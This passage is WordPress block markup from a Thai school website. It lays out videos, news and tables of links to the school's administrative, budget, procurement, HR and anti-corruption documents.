{\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a 